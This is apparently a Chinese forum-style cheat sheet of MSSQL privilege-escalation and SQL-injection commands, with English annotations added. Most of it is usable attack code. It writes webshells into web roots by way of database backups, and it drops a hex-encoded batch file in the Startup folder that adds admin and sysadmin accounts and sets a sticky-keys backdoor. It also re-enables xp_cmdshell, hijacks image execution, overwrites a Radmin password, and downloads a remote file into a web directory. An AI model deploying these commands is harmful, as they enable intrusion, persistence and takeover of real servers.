
收集的一些 MSSQL提权 常用命令及提权技巧

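-- xp_dirtree: list the directories (and optionally files) under a path.
-- Parameters: path, depth (1 = immediate children only; omitted = unlimited),
-- file flag (1 = include files, adds a third 'file' column to the result).
-- It runs inside the SQL Server process, so what it can see is what the service
-- account can read, not what the caller can.
-- (The original used a single '-' before these notes, which is not a T-SQL comment.)
execute master..xp_dirtree 'c:'
execute master..xp_dirtree 'c:',1
execute master..xp_dirtree 'c:',1,1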

-------------------------------
db取系统权限5步之hta
-------------------------------

-- db_owner -> file write via BACKUP DATABASE (the "hta" variant; here it writes a PHP file).
-- Only BACKUP DATABASE permission on the current database is needed, not sysadmin; the
-- file is written by the SQL Server service account wherever that account may write.
-- 1. Full backup of the current database. 0x636E36353636 = 'cn6566'; a relative name
--    normally lands in the instance's default backup directory.
declare @a sysname,@s varchar(4000) select @a=db_name(),@s=0x636E36353636 backup database @a to disk=@s--

-- 2. Scratch table with one image column to carry the payload bytes (DROP first so the
--    sequence can be re-run).
Drop table [cn911];create table [dbo].[cn911] ([cmd] [image])--

-- 3. Payload row. The hex decodes to: <?php eval($_POST[ah]);?>
insert into cn911(cmd) values (0x3C3F706870206576616C28245F504F53545B61685D293B3F3E)--

-- 4. Differential backup to a path under the web root; the hex decodes to
--    D:\hosting\wwwroot\u4game_com\htdocs\image\x.php. The payload bytes appear verbatim
--    inside the backup file and PHP ignores everything outside the <?php ... ?> tags.
--    WITH FORMAT overwrites an existing file at that path.
declare @a sysname,@s varchar(4000) select @a=db_name (),@s=0x443A5C686F7374696E675C777777726F6F745C753467616D655F636F6D5C6874646F63735C696D6167655C782E706870 backup database @a to disk=@s WITH DIFFERENTIAL,FORMAT--

-- 5. Remove the scratch table. Both backup files stay on disk.
Drop table [cn911]--

-------------------------------
db取系统权限6步之bat
-------------------------------
-- db_owner -> file write via BACKUP LOG (the ".bat in the Startup folder" variant).
-- 1. FULL recovery model is required for transaction log backups to be allowed at all.
alter database [test] set RECOVERY FULL--
-- 2. Scratch table with one image column to carry the payload.
create table cmd (a image)--
-- 3. A log backup WITH INIT first, so the later log backup contains little besides the payload.
backup log [test] to disk = 'c:\windows\temp\cmd1' with init--
insert into cmd (a) values (0x406563686F206F66660D0A406563686F206F66660D0A40636D642E657865202F63206563686F2065786563206D61737465722E64626F2E73705F6164646C6F67696E20276A61636B272C276A61636B27203E746573742E7172790D0A40636D642E657865202F63206563686F2065786563206D61737465722E64626F2E73705F6164646C6F67696E20276A61636B272C276A61636B27203E746573742E7172790D0A40636D642E657865202F63206563686F20657865632073705F616464737276726F6C656D656D62657220276A61636B272C2773797361646D696E27203E3E746573742E7172790D0A40636D642E657865202F63206563686F20657865632073705F616464737276726F6C656D656D62657220276A61636B272C2773797361646D696E27203E3E746573742E7172790D0A40636D642E657865202F63206973716C202D45202F5520616C6D61202F50202F6920633A5C746573742E7172790D0A40636D642E657865202F63206973716C202D45202F5520616C6D61202F50202F6920633A5C746573742E7172790D0A40636D642E657865202F63206E65743120757365722073716C6465627567676572206675636B796F756D616D610D0A40636D642E657865202F63206E65743120757365722073716C6465627567676572206675636B796F756D616D610D0A40636D642E657865202F63206E65743120757365722073716C6465627567676572202F6163746976653A7965730D0A40636D642E657865202F63206E65743120757365722073716C6465627567676572202F6163746976653A7965730D0A40636D642E657865202F63206E657431206C6F63616C67726F75702061646D696E6973747261746F72732073716C6465627567676572202F6164640D0A40636D642E657865202F63206E657431206C6F63616C67726F75702061646D696E6973747261746F72732073716C6465627567676572202F6164640D0A40636D642E657865202F63206373637269707420633A5C77696E646F77735C74656D705C73686966742E7662730D0A40636D642E657865202F63206373637269707420633A5C77696E646F77735C74656D705C73686966742E7662730D0A40636D642E657865202F63206373637269707420633A5C77696E646F77735C74656D705C686173682E7662730D0A40636D642E657865202F63206373637269707420633A5C77696E646F77735C74656D705C686173682E7662730D0A40636D642E657865202F63206361636C7320633A5C77696E646F77735C73797374656D33325C73657468632E657865202F74202F65202F63202F672065766572796F6E653A660D0A40636D642E657865202F63206361636C73
20633A5C77696E646F77735C73797374656D33325C73657468632E657865202F74202F65202F63202F672065766572796F6E653A660D0A40636D642E657865202F63206361636C7320633A5C77696E646F77735C73797374656D33325C73657468632E657865202F74202F65202F63202F672061646D696E6973747261746F72733A660D0A40636D642E657865202F63206361636C7320633A5C77696E646F77735C73797374656D33325C73657468632E657865202F74202F65202F63202F672061646D696E6973747261746F72733A660D0A40636D642E657865202F6320636F707920633A5C77696E646F77735C73797374656D33325C7461736B6D67722E65786520633A5C77696E646F77735C73797374656D33325C73657468632E657865202F790D0A40636D642E657865202F6320636F707920633A5C77696E646F77735C73797374656D33325C7461736B6D67722E65786520633A5C77696E646F77735C73797374656D33325C73657468632E657865202F790D0A40636D642E657865202F632064656C202530250D0A40636D642E657865202F632064656C202530250D0A400D0A40)--
-- 5. Log backup into the (Chinese-localized) All Users Startup folder; the path is
--    locale-specific. x.bat runs at the next interactive logon, as that user — so the
--    sysadmin grant inside it only succeeds when an administrator logs on.
backup log [test] to disk = 'C:\Documents and Settings\All Users\「开始」菜单\程序\启动\x.bat'--
-- 6. Remove the scratch table (the recovery model is left at FULL).
drop table cmd--

REM Decoded contents of the hex inserted above (dropped as x.bat in the Startup folder).
REM Every line appears twice in the original; the duplication is harmless.
REM NOTE(review): this listing differs from the hex above in the 'net1 user sqldebugger' password token.
@echo off
@echo off
REM Write a two-line SQL script into the *current* directory ...
@cmd.exe /c echo exec master.dbo.sp_addlogin 'jack','jack' >test.qry
@cmd.exe /c echo exec master.dbo.sp_addlogin 'jack','jack' >test.qry
@cmd.exe /c echo exec sp_addsrvrolemember 'jack','sysadmin' >>test.qry
@cmd.exe /c echo exec sp_addsrvrolemember 'jack','sysadmin' >>test.qry
REM ... but isql reads c:\test.qry, so the two only agree when the working directory is C:\.
REM -E (trusted connection) together with /U /P is contradictory; the trusted connection is the
REM point here — it runs as whoever logged on, which must be a local admin/sysadmin for this to work.
@cmd.exe /c isql -E /U alma /P /i c:\test.qry
@cmd.exe /c isql -E /U alma /P /i c:\test.qry
REM Take over the pre-existing 'sqldebugger' account: set its password, enable it, make it admin.
@cmd.exe /c net1 user sqldebugger daoke
@cmd.exe /c net1 user sqldebugger daoke
@cmd.exe /c net1 user sqldebugger /active:yes
@cmd.exe /c net1 user sqldebugger /active:yes
@cmd.exe /c net1 localgroup administrators sqldebugger /add
@cmd.exe /c net1 localgroup administrators sqldebugger /add
REM shift.vbs / hash.vbs are referenced but not provided on this page.
@cmd.exe /c cscript c:\windows\temp\shift.vbs
@cmd.exe /c cscript c:\windows\temp\shift.vbs
@cmd.exe /c cscript c:\windows\temp\hash.vbs
@cmd.exe /c cscript c:\windows\temp\hash.vbs
REM Sticky-keys backdoor: loosen the ACL on the protected sethc.exe, then replace it with taskmgr.exe
REM so that pressing Shift five times at the logon screen opens a SYSTEM task manager.
@cmd.exe /c cacls c:\windows\system32\sethc.exe /t /e /c /g everyone:f
@cmd.exe /c cacls c:\windows\system32\sethc.exe /t /e /c /g everyone:f
@cmd.exe /c cacls c:\windows\system32\sethc.exe /t /e /c /g administrators:f
@cmd.exe /c cacls c:\windows\system32\sethc.exe /t /e /c /g administrators:f
@cmd.exe /c copy c:\windows\system32\taskmgr.exe c:\windows\system32\sethc.exe /y
@cmd.exe /c copy c:\windows\system32\taskmgr.exe c:\windows\system32\sethc.exe /y
REM Self-delete. The bare '@' lines are leftovers of the hex encoding.
@cmd.exe /c del %0%
@cmd.exe /c del %0%
@
@

-------------------------------
sa取系统权限之sp_makewebtask
-------------------------------
-- sa-only: sp_makewebtask writes the query result as an HTML file, here c:\1.hta. The embedded
-- VBScript creates a local user ('net1 user jack ... /add'), but an .hta only runs when something
-- launches it with mshta — on its own the file does nothing until a user (or a Startup-folder drop
-- like the .bat variant above) executes it. Doubled single quotes are escaping inside @query.
-- Needs xp_makewebtask (xpweb70.dll); the Web Assistant procedures are gone from SQL Server 2005 on.
sp_makewebtask 'c:\1.hta',' select ''<script language=VBScript> 
On Error Resume Next 
set wshshell=createobject("wscript.shell") 
a=wshshell.run ("command.com /c net1 user jack jackjack123!@# /add",0) 
</script>'' ';--
------------------------------
xp_lake2 提权
------------------------------

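-- xp_lake2: a third-party extended-procedure DLL that runs OS commands. The DLL has to be on
-- the server's disk first (the path suggests it was dropped through the web app's upload folder).

-- Run a command (only after the DLL has been registered below).
exec xp_lake2 'ipconfig'

-- Register the DLL, either under its own name or under the name xp_cmdshell. The name given
-- must be a function exported by the DLL, otherwise you get error 127 ("function not found",
-- see the xp_cmdshell recovery notes below). Requires sysadmin.
sp_addextendedproc xp_cmdshell,@dllname='E:\InetPub\wwwRoot\uploadfile\xp_lake2.dll'
sp_addextendedproc 'xp_lake2', 'E:\InetPub\wwwRoot\uploadfile\xp_lake2.dll'

-- Unregister it again. (The original had a typo here: sp_dropxtendedproc.)
sp_dropextendedproc xp_lake2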

------------------------------
xp_cmdshell 提权
------------------------------

-- Run an OS command through xp_cmdshell. It executes inside the SQL Server process, i.e.
-- as the service account (sysadmin callers); output comes back as a result set.
exec master.dbo.xp_cmdshell 'cmd /c ipconfig'

-- Re-register xp_cmdshell if it has been dropped. On SQL Server 2000 it lives in xplog70.dll.
-- (On 2005+ the usual blocker is the sp_configure option, not a missing registration — see below.)
EXEC sp_addextendedproc xp_cmdshell ,@dllname ='xplog70.dll'

xp_cmdshell新的恢复办法 (效果很好)
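-- "Delete": what a hardening script typically does to make command execution harder.
-- (DROP PROCEDURE on an extended procedure works here; sp_dropextendedproc is the documented form.)
drop procedure sp_addextendedproc
drop procedure sp_oacreate
exec master.dbo.sp_dropextendedproc 'xp_cmdshell'
-- "Restore": dbcc addextendedproc is the primitive that sp_addextendedproc merely wraps
-- (its one-line source is further down this page), so dropping the wrapper removes nothing.
-- Requires sysadmin.
dbcc addextendedproc ("sp_oacreate","odsole70.dll")
dbcc addextendedproc ("xp_cmdshell","xplog70.dll")
-- Takeaway: this restores directly, regardless of whether sp_addextendedproc still exists.
-- For defenders, dropping procedures is not a control; only sysadmin membership is.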

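-- Manual xp_cmdshell recovery, same idea as above.
-- "Delete" side:
drop procedure sp_addextendedproc
drop procedure sp_oacreate
exec master.dbo.sp_dropextendedproc 'xp_cmdshell'
-- "Restore" side, written as stacked statements for an injection point (leading ';',
-- explicit USE master because the web app's context is a user database):
;use master;dbcc addextendedproc ("sp_oacreate","odsole70.dll")
;use master;dbcc addextendedproc ("xp_cmdshell","xplog70.dll")
-- Same statements with /**/ in place of spaces (defeats naive space filtering) and
-- bracketed identifiers in place of quoted strings (defeats quote filtering):
;exec/**/master..sp_addextendedproc/**/[xp_cmdshell],[xplog70.dll]--
;use/**/master/**/dbcc/**/addextendedproc([xp_cmdshell],[xplog70.dll])--
;use/**/master/**/dbcc/**/addextendedproc([sp_OACreate],[odsole70.dll])--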

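-- Restore xp_cmdshell and verify: sysobjects.xtype = 'X' marks an extended stored procedure,
-- so a count of 1 means the registration exists (not that the DLL actually loads).
Exec master.dbo.sp_addextendedproc 'xp_cmdshell','xplog70.dll';select count(*) from master.dbo.sysobjects where xtype='X' and name='xp_cmdshell'
-- A result of 1 is what you want.

-- If xplog70.dll itself is gone from the Binn directory, upload a copy and register it by
-- full path. The SQL Server service account must be able to read that path.
Exec master.dbo.sp_addextendedproc 'xp_cmdshell','F:\xx.com\xplog70.dll'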

常见情况恢复执行xp_cmdshell.

1 未能找到存储过程'master..xpcmdshell'.
恢复方法:查询分离器连接后,
第一步执行:EXEC sp_addextendedproc xp_cmdshell,@dllname ='xplog70.dll'(原文行尾多出的 declare @o int 是误贴,已去掉)
第二步执行:EXEC sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll'(xpsql70.dll 是 SQL Server 7.0 上 xp_cmdshell 所在的 DLL;2000 上用第一步的 xplog70.dll 即可,两步按版本只需执行其一)
然后按F5键命令执行完毕

2 无法装载 DLL xpsql70.dll 或该DLL所引用的某一 DLL。原因126(找不到指定模块。)
恢复方法:查询分离器连接后,
第一步执行:EXEC sp_dropextendedproc "xp_cmdshell"
第二步执行:EXEC sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll'(错误 126 表示 DLL 文件本身找不到,再注册同一个 DLL 名并不能解决;应改用服务器上确实存在的 DLL——SQL Server 2000 为 xplog70.dll——或者先把 DLL 上传到服务器后按完整路径注册,见上文)
然后按F5键命令执行完毕

3 无法在库 xpweb70.dll 中找到函数 xp_cmdshell。原因: 127(找不到指定的程序。)
恢复方法:查询分离器连接后,
第一步执行:exec sp_dropextendedproc 'xp_cmdshell'
第二步执行:exec sp_addextendedproc 'xp_cmdshell','xplog70.dll'(错误 127 说明 xpweb70.dll 里没有名为 xp_cmdshell 的导出函数——该 DLL 导出的是 xp_makewebtask;原文在第二步再次注册 xpweb70.dll 只会重现同一错误,SQL Server 2000 的 xp_cmdshell 位于 xplog70.dll)
然后按F5键命令执行完毕

4 SQL Server 阻止了对组件 'xp_cmdshell' 的 过程'sys.xp_cmdshell' 的访问,因为此组件已作为此服务器安全配置的一部分而被关闭。系统管理员可以通过使用 sp_configure 启用 'xp_cmdshell'。有关启用 'xp_cmdshell' 的详细信息,请参阅 SQL Server 联机丛书中的 "外围应用配置器"。
恢复方法:查询分离器连接后,
第一步执行:EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE;
然后按F5键命令执行完毕

mssql2005

启用xp_cmdshell

-- SQL Server 2005+: enable xp_cmdshell through sp_configure. Needs ALTER SETTINGS
-- (sysadmin or serveradmin). 'show advanced options' is toggled around it because
-- xp_cmdshell is an advanced option; it is set back to 0 afterwards so the visible
-- configuration looks untouched. WITH OVERRIDE skips value validation; plain RECONFIGURE
-- would also do. Each change is written to the ERRORLOG as a
-- "Configuration option 'xp_cmdshell' changed from 0 to 1" message — the thing to alert on.
USE master 
EXEC sp_configure 'show advanced options', 1 
RECONFIGURE WITH OVERRIDE 
EXEC sp_configure 'xp_cmdshell', 1 
RECONFIGURE WITH OVERRIDE 
EXEC sp_configure   'show advanced options', 0
RECONFIGURE WITH OVERRIDE 

-- Disable xp_cmdshell again (same sequence, value 0).
USE master 
EXEC sp_configure 'show advanced options', 1 
RECONFIGURE WITH OVERRIDE 
EXEC sp_configure 'xp_cmdshell', 0 
RECONFIGURE WITH OVERRIDE 
EXEC sp_configure   'show advanced options', 0
RECONFIGURE WITH OVERRIDE 

--------------------------------------
只要ws没删 用下面这个语句百试不爽
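-- OLE Automation route: as long as the WScript.Shell COM class is registered ("ws not deleted"),
-- this runs a command even with xp_cmdshell gone. sp_OACreate is sysadmin-only by default and,
-- on 2005+, needs 'Ole Automation Procedures' enabled (see the sp_configure lines below).
-- Run returns only an exit code, so the command executes blind.
-- (The [url=...]...[/url] fragments around @shell in the original were forum markup.)
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c ipconfig'

-- Same call with bracketed identifiers standing in for string literals — EXEC accepts an
-- unquoted identifier as a string argument — which avoids single quotes in an injected payload.
DECLARE @s int EXEC sp_oacreate [wscript.shell], @s out EXEC sp_oamethod @s,[run], NULL, [d:\cmd.exe /c dir c:\] --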

--------------------------------------

--------------------------------------
sa(shift取系统权限)

-- Sticky-keys backdoor via Scripting.FileSystemObject (sysadmin): replace sethc.exe with a copy
-- of taskmgr.exe, so five Shift presses at the logon screen open a task manager as SYSTEM.
-- FSO CopyFile overwrites the destination by default.
declare @o int exec sp_oacreate 'scripting.filesystemobject', @o out exec sp_oamethod @o, 'copyfile',null,'c:\windows\system32\taskmgr.exe' ,'c:\windows\system32\sethc.exe'; 

-- Same copy into dllcache, presumably so Windows File Protection restores the replaced
-- binary rather than the genuine one.
declare @oo int exec sp_oacreate 'scripting.filesystemobject', @oo out exec sp_oamethod @oo, 'copyfile',null,'c:\windows\system32\taskmgr.exe' ,'c:\windows\system32\dllcache\sethc.exe';

--------------------------------------

在WEBSHELL里转了半天还是没什么收获,感觉还是得靠那个SA来提权,于是笔者问了下朋友,他说你怎么忘了沙盒模式?
看来最近脑子晕了于是在查询分析器里执行:
意思是修改注册表,开启沙盒:
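-- Jet sandbox mode. The value lives under HKLM\SOFTWARE\Microsoft\Jet\4.0\Engines — the first
-- line of the original wrote to '...\Jet\4.0\Engine' (no 's'), which just creates a dead key.
-- Meanings are listed below: 0 disables the sandbox for everyone, 1 disables it for non-Access
-- callers such as SQL Server. Either setting lets the shell() in the OPENROWSET below run;
-- the installation default is 3. Requires sysadmin (xp_regwrite).
EXEC master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',0

exec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',1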

0   对所有应用关闭沙盒(shell() 等危险函数可用)
1   仅对 Access 启用沙盒,对 SQL Server 等非 Access 调用者关闭
2   对 Access 关闭沙盒,对其它调用者启用
3   对所有应用启用沙盒(安装默认值)
(原文把"默认"标在 0 上,实际默认值是 3。SQL Server 属于非 Access 调用者,所以写 0 或 1 都能让下面的 shell() 执行。)

通过沙盒添加用户
Select * From OpenRowSet('Microsoft.Jet.OLEDB.4.0',';Database=c:\windows\system32\ias\ias.mdb','select shell("cmd.exe /c ipconfig")');

通过 Run 键做持久化(注意:下面两条并不会新建帐户,它们只是在下一次有人交互登录时、以该登录用户的身份执行;第二条要求 jack 已经存在,且登录的用户本身就是管理员。原文称 DB 权限即可,这取决于版本和补丁——SQL Server 2005 起 xp_regwrite 默认仅 sysadmin 可调用)
-- Persistence via HKLM\...\CurrentVersion\Run: both values run at the next interactive logon
-- of any user, in that user's security context (not at boot, not as SYSTEM).
xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\currentversion\run','jack','REG_SZ','ipconfig'
-- Nothing here creates 'jack'; this only does something if the account already exists and the
-- user who logs on is an administrator. xp_regwrite itself is sysadmin-only on 2005+.
xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\currentversion\run','jack1','REG_SZ','net localgroup administrators jack /add' 

映像劫持
xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows NT\currentversion\Image File Execution Options\sethc.exe','debugger','REG_SZ','c:\windows\system32\taskmgr.exe'

--------------------
sa radmin提权
--------------------
某机,安装了radmin,密码被修改了,regedit.exe不知道被删除了还是被改名了,net.exe不存在,没有办法使用regedit /e 导入注册文件,但是mssql是sa权限,使用如下命令
EXEC master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','SYSTEM\RAdmin\v2.0\Server\Parameters','Parameter','REG_BINARY',0x02ba5e187e2589be6f80da0046aa7e3c 
即可修改密码为12345678(该 REG_BINARY 值是 Radmin 2.x 存储的、与口令 12345678 对应的散列,原文如此,此处未另行验证)。如果要修改端口值 
EXEC master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','SYSTEM\RAdmin\v2.0\Server\Parameters','port','REG_BINARY',0xd20400 则端口值改为1234(0xd20400 是 1234 = 0x04D2 的小端序字节表示)

删除添加储存过程
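-- Dropping sp_addlogin: sometimes done as "hardening" in master.
drop procedure sp_addlogin
-- There is no "add procedure" statement in T-SQL (the original listed one). sp_addlogin is an
-- ordinary T-SQL procedure, so unlike the extended procedures above it cannot be re-registered
-- with sp_addextendedproc; it can only be recreated with CREATE PROCEDURE from its original
-- definition, which this page does not include. On 2005+ CREATE LOGIN does the same job.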

恢复存储过程

于是马上想到恢复存储过程来执行命令,于是在查询分析器里执行: 

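use master 
-- Re-register the extended procedures a hardening pass usually drops (SQL Server 2000 DLL layout).
-- Each name must be a function exported by the named DLL (error 127 otherwise) and the DLL must be
-- present on the server (error 126 otherwise). Requires sysadmin.

-- xplog70.dll: xp_cmdshell and the login/group XPs. The original listed 'xp_cmdshell.dll' for
-- xp_cmdshell, which is not a shipped DLL; xplog70.dll is what the rest of this page uses.
exec sp_addextendedproc xp_cmdshell,'xplog70.dll' 
exec sp_addextendedproc xp_enumgroups,'xplog70.dll' 
exec sp_addextendedproc xp_loginconfig,'xplog70.dll' 

-- xpstar.dll: file-system, drive, error-log and registry XPs.
exec sp_addextendedproc xp_dirtree,'xpstar.dll' 
exec sp_addextendedproc xp_fixeddrives,'xpstar.dll' 
exec sp_addextendedproc xp_enumerrorlogs,'xpstar.dll' 
exec sp_addextendedproc xp_getfiledetails,'xpstar.dll' 
exec sp_addextendedproc xp_regaddmultistring,'xpstar.dll' 
exec sp_addextendedproc xp_regdeletekey,'xpstar.dll' 
exec sp_addextendedproc xp_regdeletevalue,'xpstar.dll' 
exec sp_addextendedproc xp_regenumvalues,'xpstar.dll' 
exec sp_addextendedproc xp_regread,'xpstar.dll' 
exec sp_addextendedproc xp_regremovemultistring,'xpstar.dll' 
exec sp_addextendedproc xp_regwrite,'xpstar.dll' 
exec sp_addextendedproc xp_availablemedia,'xpstar.dll'

-- odsole70.dll: OLE Automation procedures.
exec sp_addextendedproc sp_OACreate,'odsole70.dll' 
exec sp_addextendedproc sp_OADestroy,'odsole70.dll' 
exec sp_addextendedproc sp_OAGetErrorInfo,'odsole70.dll' 
exec sp_addextendedproc sp_OAGetProperty,'odsole70.dll' 
exec sp_addextendedproc sp_OAMethod,'odsole70.dll' 
exec sp_addextendedproc sp_OASetProperty,'odsole70.dll' 
exec sp_addextendedproc sp_OAStop,'odsole70.dll' 

-- xpweb70.dll exports xp_makewebtask; sp_makewebtask is the T-SQL wrapper around it (its source is
-- near the end of this page), so the original 'sp_makewebtask' registration could not have resolved.
exec sp_addextendedproc xp_makewebtask,'xpweb70.dll'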

恢复sp_addextendedproc,语句如下: 
-- Recreate master's sp_addextendedproc from its shipped source (original date stamp kept).
-- @functname: name to register; @dllname: DLL exporting it. Returns 0 on success, 1 if
-- called inside a transaction. Requires sysadmin.
create procedure sp_addextendedproc --- 1996/08/30 20:13
@functname nvarchar(517),/* (owner.)name of function to call */ @dllname varchar(255)/* name of DLL containing function */ as
-- Refuse to run inside a user transaction (error 15002).
set implicit_transactions off
if @@trancount > 0
begin
raiserror(15002,-1,-1,'sp_addextendedproc')
return (1)
end
-- The real work is this single DBCC call. Because it can be issued directly, dropping this
-- wrapper (a common "hardening" step on this page) takes nothing away from a sysadmin.
dbcc addextendedproc( @functname, @dllname)
return (0) -- sp_addextendedproc

读取配置文件信息

-- Read a text file line by line through Scripting.FileSystemObject (sp_OA*, sysadmin);
-- here the Serv-U daemon configuration.
declare @o int, @f int, @t int, @ret int   -- @t is declared but never used
declare @line varchar(8000)
exec sp_oacreate 'scripting.filesystemobject', @o out
-- OpenTextFile(path, 1): mode 1 = ForReading
exec sp_oamethod @o, 'opentextfile', @f out, 'd:\Serv-U6.3\ServUDaemon.ini', 1
-- ReadLine returns a non-zero HRESULT at end of file, which is what ends the loop.
exec @ret = sp_oamethod @f, 'readline', @line out
while( @ret = 0 )
begin
print @line
exec @ret = sp_oamethod @f, 'readline', @line out
end

写进su配置文件提权

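-- Overwrite the Serv-U daemon configuration through the FileSystemObject (sp_OA*, sysadmin).
-- The original listing stopped mid-statement (the text to write was missing); @text stands
-- in for it. CreateTextFile with overwrite=1 replaces the whole file, so read the current
-- contents first (block above) and write everything back — anything omitted (existing users,
-- settings) is lost and the service may not start.
declare @o int, @f int, @ret int
declare @text varchar(8000)
set @text = ''   -- the full INI contents go here; not given on this page
exec sp_oacreate 'scripting.filesystemobject', @o out
exec sp_oamethod @o, 'createtextfile', @f out, 'd:\Serv-U6.3\ServUDaemon.ini', 1
exec @ret = sp_oamethod @f, 'writeline', NULL, @text
-- Close the stream and release both COM objects so the file handle is not left open.
exec sp_oamethod @f, 'close'
exec sp_oadestroy @f
exec sp_oadestroy @o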

查看终端
exec master..xp_regread 'HKEY_LOCAL_MACHINE','SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp','PortNumber'

SQL语句下载

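-- Download a file onto the database server with MSXML + ADODB.Stream via OLE Automation
-- (sysadmin; 2005+ needs 'Ole Automation Procedures'). Bracketed tokens such as [GET] are
-- identifiers that EXEC passes as strings — a way to avoid quotes in an injected payload.
-- The [url]...[/url] around the address in the original was forum markup, removed here.
DECLARE 
@B varbinary(8000),   -- responseBody; on SQL 2000 this caps the download at 8000 bytes
@hr int,
@http INT,
@down INT 

EXEC sp_oacreate [Microsoft.XMLHTTP],@http output 
-- Synchronous GET, issued from the database server's own network position.
EXEC @hr = sp_oamethod @http,[Open],null,[GET],[http://xxx.org/jsp.zip],0 
EXEC @hr = sp_oamethod @http,[Send],null 
EXEC @hr=sp_OAGetProperty @http,[responseBody],@B output 
EXEC @hr=sp_oacreate [ADODB.Stream],@down output 
EXEC @hr=sp_OASetProperty @down,[Type],1      -- adTypeBinary
EXEC @hr=sp_OASetProperty @down,[mode],3      -- adModeReadWrite
EXEC @hr=sp_oamethod @down,[Open],null 
EXEC @hr=sp_oamethod @down,[Write],null,@B 
-- SaveToFile option 1 = adSaveCreateNotExist: fails if the target exists (2 would overwrite).
-- Every @hr above is assigned but never checked, so a failed step goes unnoticed.
EXEC @hr=sp_oamethod @down,[SaveToFile],null,[d:\java\Tomcat 5.5\webapps\XXXX\1.jsp],1 ;--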

web注入
字符型需要在浏览器输入' 如id=xx';
数字型则不需要          如id=xx;

sa直接写一句话
sp_makewebtask 'e:\gygov.com\xx.asp',' select ''<%execute request("ah")%>'' ';--

-------------------------------------------------------------------
sql备份

日志备分WEBSHELL标准的七步:
1.InjectionURL';alter database mm_db set RECOVERY FULL-- (把SQL设置成日志完全恢复模式)
2.InjectionURL';create table cmd (a image)-- (新建立一个cmd表)
3.InjectionURL';backup log mm_db to disk = 'c:\cmd' with init-- (减少备分数据的大小)
4.InjectionURL';insert into cmd (a) values ('<%%25eval(request("a")):response.end%%25>')-- (插入一句话木马)
5.InjectionURL';backup log mm_db to disk = 'd:\chinakm\test.asp'-- (备分日志到WEB路径)
6.InjectionURL';drop table cmd-- (删除新建的cmd表)
7.InjectionURL';alter database mm_db set RECOVERY SIMPLE--(把SQL设置成日志简单恢复模式)

数据库差异备份代码:

1、create table [dbo].[jm_tmp] ([cmd] [image])-- 创建一个表

2、declare @a sysname,@s nvarchar(4000) select @a=db_name(),@s=0X6A006D00640063007700 backup database @a to disk = @s --备份数据库,@s为备份名称(jmdcw的16进制转换)

3、insert into [jm_tmp](cmd) values(0x3C2565786563757465287265717565737428226C222929253E)--将一句话木马 "<%execute(request("l"))%>"的16进制字符插入到表中

4、declare @a sysname,@s nvarchar(4000) select @a=db_name(),@s='C:\xx.asp' backup database @a to disk = @s WITH DIFFERENTIAL,FORMAT --对数据库实行差异备份,备份的保存路径暂定为C盘目录,文件名为xx.asp。

5、drop table [jm_tmp]-- 删除此表。

Mssql2005 Log备份Webshell 9步
-- SQL Server 2005 log-backup webshell, URL-encoded for an injection point: /**/ stands for
-- spaces and %3D for '='. Database name, scratch table and paths are site-specific.
-- 1. FULL recovery so transaction log backups are allowed.
;alter/**/database/**/[ikoreadb]/**/set/**/recovery/**/full--
-- 2. Full backup first (a log backup needs a base). 0x640062006200610063006B00 = N'dbback'.
;declare/**/@d/**/nvarchar(4000)/**/select/**/@d%3D0x640062006200610063006B00/**/backup/**/database/**/[ikoreadb]/**/to/**/disk%3D@d/**/with/**/init--
-- 3/4. Fresh scratch table with one image column.
;drop/**/table/**/[JCZ3Tmp]--
;create/**/table/**/[JCZ3Tmp]([a]/**/image)--
-- 5. Log backup WITH INIT so the next log backup holds little besides the payload.
;declare/**/@d/**/nvarchar(4000)/**/select/**/@d%3D0x640062006200610063006B00/**/backup/**/log/**/[ikoreadb]/**/to/**/disk%3D@d/**/with/**/init--
-- 6. Payload row; the hex decodes to <%Execute(request("ah"))%>
;insert/**/into/**/[JCZ3Tmp]([a])/**/values(0x3C2545786563757465287265717565737428226168222929253E)--
-- 7. Log backup into the web root; the hex decodes to N'd:\ikoreaweb\userfiles\file\sss.asp'
;declare/**/@d/**/nvarchar(4000)/**/select/**/@d%3D0x64003A005C0069006B006F007200650061007700650062005C007500730065007200660069006C00650073005C00660069006C0065005C007300730073002E00610073007000/**/backup/**/log/**/[ikoreadb]/**/to/**/disk%3D@d/**/with/**/init--
-- 8. Drop the scratch table.
;drop/**/table/**/[JCZ3Tmp]--
-- 9. One more log backup over 'dbback' to truncate the log. The recovery model is left at FULL
--    (the 7-step ASP variant above resets it to SIMPLE), a lasting, visible change.
;declare/**/@d/**/nvarchar(4000)/**/select/**/@d%3D0x640062006200610063006B00/**/backup/**/log/**/[ikoreadb]/**/to/**/disk%3D@d/**/with/**/init--

-----------------------------------------------------------------------

-获得MS SQL的版本号 
execute master..sp_msgetversion

获取当前库服务器机器名
Select host_name() 

-------------------------------------
创建个登陆mssql的帐号
-------------------------------------
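-- Create a SQL login 'jack' with password 'jack' (SQL 2000 form; CREATE LOGIN on 2005+).
exec master.dbo.sp_addlogin jack,jack;--
-- Add that login to the sysadmin role. The original granted the role to 'satan' although the
-- text says it elevates the login just created; the two names must match.
-- Both steps are recorded by the default trace / audit on 2005+ (login created, role change).
exec master.dbo.sp_addsrvrolemember jack,sysadmin;--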

我记性不好,所以把常用的注入代码记录下来,有点乱,但对我来说,还算很有用,希望大家也会喜欢!

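-- List every local Windows group on the server (the original marks the required role as dbo).
-- '//' is not a T-SQL comment marker; the trailing notes were changed to '--'.
execute master..xp_enumgroups -- dbo

-- List the drive letters the server can see (the original marks the required role as dbo).
execute master..xp_availablemedia -- dbo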

//看看是什么权限的
and 1=(Select IS_MEMBER('db_owner'))
And char(124)%2BCast(IS_MEMBER('db_owner') as varchar(1))%2Bchar(124)=1 ;--

